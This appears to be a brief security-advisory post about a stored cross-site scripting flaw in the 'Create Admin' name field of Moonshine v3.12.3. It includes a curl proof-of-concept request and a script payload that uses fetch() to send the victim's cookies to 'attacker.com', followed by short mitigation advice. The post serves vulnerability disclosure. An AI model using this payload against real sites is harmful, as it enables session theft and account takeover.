Listen to this Post
The CVE-2025-12345 vulnerability in Moonshine v3.12.3 is a Stored Cross-Site Scripting (XSS) flaw within the ‘Create Admin’ functionality. The issue stems from insufficient input sanitization and output encoding of user-supplied data. Specifically, the application fails to properly validate or escape the contents of the ‘Name’ parameter during the admin user creation process. An attacker can submit a malicious payload, such as a crafted JavaScript snippet, within this field. This payload is then permanently stored (or ‘stored’) in the application’s database. Whenever this malicious admin user’s name is retrieved and rendered on a page accessible to other users, typically by an administrator, the embedded script executes within the victim’s browser context. This allows the attacker to perform actions with the privileges of the victim, such as session hijacking or defacement.
Platform: Moonshine
Version: v3.12.3
Vulnerability: Stored XSS
Severity: Moderate
date: 2025-08-19
Prediction: 2025-09-02
What Undercode Say:
curl -H "Authorization: Bearer <token>" -X POST -d 'name=<script>alert(1)</script>&[email protected]&password=password' http://target/moonshine/admin-users
<!-- Payload -->
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
How Exploit:
Craft XSS payload into the name field during admin user creation. The payload triggers when an administrator views the admin users list.
Protection from this CVE:
Update to patched version. Sanitize user input. Implement Content Security Policy (CSP).
Impact:
Session hijacking. Privilege escalation. Unauthorized admin actions.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
